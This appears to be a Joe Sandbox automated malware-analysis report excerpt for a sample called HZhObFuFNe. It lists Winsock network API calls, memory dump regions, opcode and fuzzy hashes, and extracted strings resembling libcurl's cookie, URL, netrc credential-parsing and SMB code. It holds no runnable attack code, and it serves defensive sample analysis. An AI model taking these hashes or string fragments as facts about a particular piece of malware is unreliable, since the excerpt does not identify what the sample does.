                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00CD3C41,00000000), ref: 00CEB0C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastconnect
                                                            • String ID:
                                                            • API String ID: 374722065-0
                                                            • Opcode ID: 18ad1b8811a99d2989ca58bf39a55816fbc62bd419f8be06752f894fc6f032fb
                                                            • Instruction ID: 2a7d8c7c4ec98590b5dedc07935292c3cc3108a53f2005e3eb473fffb44a24af
                                                            • Opcode Fuzzy Hash: 18ad1b8811a99d2989ca58bf39a55816fbc62bd419f8be06752f894fc6f032fb
                                                            • Instruction Fuzzy Hash: 7601D4762042419BCA205A6AC984EBBB399FF89364F040B64F978931E1D726FE508762
                                                            APIs
                                                            • gethostname.WS2_32(00000000,00000040), ref: 00CD4AA5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: gethostname
                                                            • String ID:
                                                            • API String ID: 144339138-0
                                                            • Opcode ID: ad53e690c594cbbb5c6633c2be81917b5794b3826fe6ee54a824b911979d65b3
                                                            • Instruction ID: 670c4688a5dcd18ccc3e453024b7fc5ce04d43f97c37bc703a8aa1e9287c744f
                                                            • Opcode Fuzzy Hash: ad53e690c594cbbb5c6633c2be81917b5794b3826fe6ee54a824b911979d65b3
                                                            • Instruction Fuzzy Hash: FD51F3706047009BEB389B26DD8972376D8EF11325F18183FEB9A867D1E774E944D702
                                                            APIs
                                                            • getsockname.WS2_32(?,?,00000080), ref: 00CEAFD1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID:
                                                            • API String ID: 3358416759-0
                                                            • Opcode ID: b08a06f8413e0d41b7f59f455a35d23b445786b60821a57e75293c9f36e3b067
                                                            • Instruction ID: 8971266f166d5489b26b054a2c23bee4f709a88a862d079123921f28a02b71a7
                                                            • Opcode Fuzzy Hash: b08a06f8413e0d41b7f59f455a35d23b445786b60821a57e75293c9f36e3b067
                                                            • Instruction Fuzzy Hash: B11196708087C599EB268F5DD4027F6B3F4EFD0329F109A18E5A942150F7769AC58BC2
                                                            APIs
                                                            • send.WS2_32(?,?,?,00000000,00000000,?), ref: 00CEA97F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: send
                                                            • String ID:
                                                            • API String ID: 2809346765-0
                                                            • Opcode ID: 55edeb4a2aba21f99d1f3e9c78266863a08f494a5e294a364474d45dd1a621f0
                                                            • Instruction ID: 118dbf76051439471e2459422644b1e152c6b1a80baf12d3b61f6c45a555ed5d
                                                            • Opcode Fuzzy Hash: 55edeb4a2aba21f99d1f3e9c78266863a08f494a5e294a364474d45dd1a621f0
                                                            • Instruction Fuzzy Hash: A301A272B10710AFC6148F15DC85B56B7A5EFC4721F068659FA982B362C331BC108BE2
                                                            APIs
                                                            • socket.WS2_32(?,00CEB280,00000000,-00000001,00000000,00CEB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00CEAF66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: socket
                                                            • String ID:
                                                            • API String ID: 98920635-0
                                                            • Opcode ID: 576b7e077dd6464960a6063ef37db2ac5ac945d31f90c643ec25619ac9e1683a
                                                            • Instruction ID: 88ff6d1043e80ad1397b7ef06f99a37007fd6a2f6e839fa210e63cd3ebee2c9a
                                                            • Opcode Fuzzy Hash: 576b7e077dd6464960a6063ef37db2ac5ac945d31f90c643ec25619ac9e1683a
                                                            • Instruction Fuzzy Hash: 00E0EDB6A052216FD6649B58E8449ABF3ADEFC4B20F055A49BC6463214C730BD508BE2
                                                            APIs
                                                            • closesocket.WS2_32(?,00CE9422,?,?,?,?,?,?,?,?,?,?,?,00CD3377,010A9520,00000000), ref: 00CEB04C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: closesocket
                                                            • String ID:
                                                            • API String ID: 2781271927-0
                                                            • Opcode ID: 39030e319640a17023575aa2f0ed21e12ff8cc8e1171441a11f8e32d48848439
                                                            • Instruction ID: b8b00305c37a406feb6f43c0df3ffe38a8d3c7f31c87f6aeebad22d2ee83bb7d
                                                            • Opcode Fuzzy Hash: 39030e319640a17023575aa2f0ed21e12ff8cc8e1171441a11f8e32d48848439
                                                            • Instruction Fuzzy Hash: 17D0C2B070024157CA248A55C884A67B32B7FC1710F29CB6CE43C8A150C73BED43C601
                                                            APIs
                                                            • ioctlsocket.WS2_32(?,8004667E,?,?,00C5AF56,?,00000001), ref: 00C867FC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: ioctlsocket
                                                            • String ID:
                                                            • API String ID: 3577187118-0
                                                            • Opcode ID: 65a8dc44593293f174a777e5ab2485ec9fd677680aab73ad27a89fea320a61aa
                                                            • Instruction ID: fd7d81672d212ed3b44b79f2b11354356f5c918ce99ed8121b6d4dadcf1e78ad
                                                            • Opcode Fuzzy Hash: 65a8dc44593293f174a777e5ab2485ec9fd677680aab73ad27a89fea320a61aa
                                                            • Instruction Fuzzy Hash: 15C012F1118601AFC6088714D865A6F76E8DB85355F01581CB04681180EA709990CA16
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 8bc1a83b8858e9644b16f8825f0ae6da47acc6283da8d47ee8558e240f43f87a
                                                            • Instruction ID: 1764b0c8ae0008eef3404ac673b813f3e5afcb833c0c30981e04d3f79a0a2fe6
                                                            • Opcode Fuzzy Hash: 8bc1a83b8858e9644b16f8825f0ae6da47acc6283da8d47ee8558e240f43f87a
                                                            • Instruction Fuzzy Hash: F531B3B49043159BCB00EFB8D98469EBBF4AF44344F008969E8A9E7345E7349A44DF52
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: f00ffc7b51f0c87aa53305fd1d76ba572e7d08631738fed2a7dd5acf182a28d6
                                                            • Instruction ID: d27ff2296e50f4ad78483eebf14b22d42d7a19d573317c9fa4c969d209a49b84
                                                            • Opcode Fuzzy Hash: f00ffc7b51f0c87aa53305fd1d76ba572e7d08631738fed2a7dd5acf182a28d6
                                                            • Instruction Fuzzy Hash: 08C04CE1C1574546DB40BA38D54A11E79E47741104FC11E68D984A6195F628931C8657
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                            • API String ID: 0-1371176463
                                                            • Opcode ID: 680e8bb26b39dd94a5a62ccef3edc22b5842e28fa348708f081250fe60a58b54
                                                            • Instruction ID: 4df5712f2d7dbc5ac2c42b9b95f15f4e19eeeb6aaea7857bc79673c8146c3568
                                                            • Opcode Fuzzy Hash: 680e8bb26b39dd94a5a62ccef3edc22b5842e28fa348708f081250fe60a58b54
                                                            • Instruction Fuzzy Hash: 5EB24870A08740ABEB30EA25DCC2B6ABBD5AF54714F08453CFC9997292E775EE00D752
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                            • API String ID: 0-122532811
                                                            • Opcode ID: 3f48e2a5236af2e7cf5d9548aae2484012dca3d2cd235af07701749438695a9e
                                                            • Instruction ID: 2906eb18f9263b8945274b0980d61d874216f9f189d3369501ee474a0d281332
                                                            • Opcode Fuzzy Hash: 3f48e2a5236af2e7cf5d9548aae2484012dca3d2cd235af07701749438695a9e
                                                            • Instruction Fuzzy Hash: C7421671B18700AFD718DE28DC81B6BB7EAEFC8700F048A2CF55997291D775B9049B92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                                            • API String ID: 0-1574211403
                                                            • Opcode ID: 566ea8ce49102b470d257b06b14bbed164b1986895ba73808ae168104f515741
                                                            • Instruction ID: 46e84d56bd623b0840e3952bd31f9e8d9fcf9af41f40672c3f76bb655933f78f
                                                            • Opcode Fuzzy Hash: 566ea8ce49102b470d257b06b14bbed164b1986895ba73808ae168104f515741
                                                            • Instruction Fuzzy Hash: 0A61F8A9B0834077E714A621AC52B3BB2D9DB95344F04443FFE8E96393FA71DE14A253
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                            • API String ID: 0-1914377741
                                                            • Opcode ID: d1b5dd86349493e20cf597dc5858d611c818ba953b36eb255a60a1826bbc7cec
                                                            • Instruction ID: 5b7973d5fad2b3652e9ba8ae211b196a26b0251bd60eaadddd24fa0a4ed09ad5
                                                            • Opcode Fuzzy Hash: d1b5dd86349493e20cf597dc5858d611c818ba953b36eb255a60a1826bbc7cec
                                                            • Instruction Fuzzy Hash: DB724930A08B419FE7318A28C5467A6B7D2BF91744F08872CEDD55B293E7B6DE84C781
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $.$;$?$?$xn--$xn--
                                                            • API String ID: 0-543057197
                                                            • Opcode ID: 1765a50f4482fdb9be4e2b11e548ba128539466b61b99b2c481fec2bc746c830
                                                            • Instruction ID: 0c6ca8083375035d39a80bf5e610ff826cd2ecfe1a23f5465af56c4de2a5c95c
                                                            • Opcode Fuzzy Hash: 1765a50f4482fdb9be4e2b11e548ba128539466b61b99b2c481fec2bc746c830
                                                            • Instruction Fuzzy Hash: A22235B2A043819BEB209A269C41B7B77D4AF90308F14483CF99997293F775DE06D753
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                            • API String ID: 0-2555271450
                                                            • Opcode ID: 12a49b7aacd0e02e58150b3788c150c2c893e6d4e1e3817d60d85e75e4d7cc8e
                                                            • Instruction ID: a283fc3c1a84fc302c8155dac6a34f02fde86ebd5527dc9a64634720a9df11c4
                                                            • Opcode Fuzzy Hash: 12a49b7aacd0e02e58150b3788c150c2c893e6d4e1e3817d60d85e75e4d7cc8e
                                                            • Instruction Fuzzy Hash: 8EC29D316087618FC718CF29D49076AB7E2FFC8314F158A2DE8AA9B751D770ED458B82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                            • API String ID: 0-2555271450
                                                            • Opcode ID: f5c2fe9759b8412ae4f9ccafbe83afe967adade6271a49c17afb98ae580b36e8
                                                            • Instruction ID: f9f0fb88fa82acfbbbf600dab59e886c17deb49a4f34f7ba3ab849fc6b3df0c9
                                                            • Opcode Fuzzy Hash: f5c2fe9759b8412ae4f9ccafbe83afe967adade6271a49c17afb98ae580b36e8
                                                            • Instruction Fuzzy Hash: 4D82D071A083119FD714CE29D88072BB7E1AFC5724F188A3CF8A9A7691D770DD46CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: default$login$macdef$machine$netrc.c$password
                                                            • API String ID: 0-1043775505
                                                            • Opcode ID: 5dff8c357d6fd939688724ffbc52d468877fe5c66373e10cccdb413ed235608c
                                                            • Instruction ID: a47a5594111aa241b73b55e5cb7be25872bec1c536e67ea33ef4093f46c4cb0a
                                                            • Opcode Fuzzy Hash: 5dff8c357d6fd939688724ffbc52d468877fe5c66373e10cccdb413ed235608c
                                                            • Instruction Fuzzy Hash: A5E1217090C3919BE721AE25D88572FBBD0AF9570CF08082CF8D557292E3B5DA48D79B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                                            • API String ID: 0-4201740241
                                                            • Opcode ID: e85cee280415bd435929e54b7656d23da1243afc1a531f521733520041aeb547
                                                            • Instruction ID: 8d9adb562e06abe6b1a7c9f5953e015f7f06138eee824a35cad0424c3c5f0b5c
                                                            • Opcode Fuzzy Hash: e85cee280415bd435929e54b7656d23da1243afc1a531f521733520041aeb547
                                                            • Instruction Fuzzy Hash: E562E0B0914741DBD714DF20C4947AAB3E4FF98304F04962DE8898B352E775FA94CB9A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                                            • API String ID: 0-2839762339
                                                            • Opcode ID: b9a68435ae2b835d868a6983befe12aebccf117c0381bb4d905c1b4616a041a0
                                                            • Instruction ID: 9134a7d0bfbc6cd7d2a76fab8ebf5b96f337f1017e27ce5cccd79b9d0dc431e6
                                                            • Opcode Fuzzy Hash: b9a68435ae2b835d868a6983befe12aebccf117c0381bb4d905c1b4616a041a0
                                                            • Instruction Fuzzy Hash: E2022AF1E093419FD7259F24CC41B6BB7E5AF92350F04882CF98987252EBB4E905E792
                                                            Strings
                                                            Memory Dump Source
